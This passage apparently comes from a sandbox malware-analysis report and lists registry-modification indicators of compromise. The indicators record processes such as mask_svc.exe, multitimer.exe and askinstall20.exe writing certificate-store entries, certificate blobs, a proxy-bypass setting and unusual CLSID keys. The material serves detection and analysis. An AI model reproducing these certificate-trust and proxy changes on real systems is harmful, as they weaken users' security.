created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2752 = "Tomsk Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust 2.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1661 = "Bahia Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-281 = "Central Europe Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-341 = "Egypt Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1842 = "Russia TZ 4 Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2412 = "Marquesas Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-365 = "Middle East Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2451 = "Saint Pierre Daylight Time" mask_svc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs 2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs 2.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-434 = "Georgian Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-672 = "AUS Eastern Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-151 = "Central America Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1501 = "Turkey Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs 2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates 2.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2492 = "Aus Central W. Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-671 = "AUS Eastern Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs 2.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1022 = "Bangladesh Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2372 = "Easter Island Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-982 = "Kamchatka Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 2.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-461 = "Afghanistan Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-391 = "Arab Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2512 = "Lord Howe Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-242 = "Samoa Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2571 = "Turks and Caicos Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-622 = "Korea Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1832 = "Russia TZ 2 Standard Time" mask_svc.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = f9043b0c4a29d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "5" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 2aadf4074a29d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.onlinecasinoground.nl\ = "0" multitimer.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main multitimer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32\ = "{94512587-22D8-4197-B757-6BA2F3DE6DEC}" vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface vpn.tmp Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\OneTimeCleanup = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History multitimer.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" multitimer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{M7E6Z6L3-BALZ-MI5F-5K37-0M55YM1D3151} svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{E8384220-1447-47B3-A22D-C96153D11F79}" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\onlinecasinoground.nl multitimer.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{S7V0R8R0-BTEQ-SG8D-7S08-7D82QC4B5132} svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "iwozcus" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{M7E6Z6L3-BALZ-MI5F-5K37-0M55YM1D3151}\1 = "4000" svchost.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings Full Program Features.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node vpn.tmp Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{K2A7A3K0-ECRB-LM0G-2M91-3G19BV5P5669}\1 = "2424" svchost.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage multitimer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\onlinecasinoground.nl\ = "0" multitimer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{X6S7Y5Y3-WINZ-VP5O-6V75-6M59ZP1Y8621} rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings Full Program Features.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{X6S7Y5Y3-WINZ-VP5O-6V75-6M59ZP1Y8621} rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState multitimer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersio = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom MicrosoftEdge.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B g4pugkmvbnp.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68